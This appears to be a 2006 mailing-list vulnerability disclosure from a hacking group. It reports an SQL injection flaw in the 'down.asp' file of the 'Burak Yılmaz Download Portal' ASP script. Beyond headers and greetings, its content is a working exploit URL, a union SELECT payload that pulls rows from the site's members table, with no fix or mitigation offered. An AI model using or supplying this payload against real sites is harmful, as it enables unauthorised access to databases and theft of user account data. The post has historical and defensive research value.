Burak Yilmaz Download Portal Sql Injection Vuln.
Date: 19 Dec 2006 19:50:47 -0000
From: [email protected]
To: [email protected]
Subject: Burak Yilmaz Download Portal Sql Injection Vuln.
X-Virus-Scanned: antivirus-gw at tyumen.ru
# LiderHack.Org & BhhGroup.Org & Bilgi-Yonetimi.Org.Tr
# script name : Burak Yılmaz Download Portal
# Script Download : http://maxiasp.com/sc_yorum.asp?scno=929
# Risk : High
# Found By : ShaFuck31
# Thanks : | Dekolax | The RИD | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | UNiKnoX |
# Vulnerable file : down.asp
#Vuln :
http://www.victim.com/ScriptPath/down.asp?id=[SqL]
http://www.victim.com/ScriptPath/down.asp?id=-1%20union%20SELECT%20*%20FROM%20uyeler%20WHERE%20uid=36
#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]
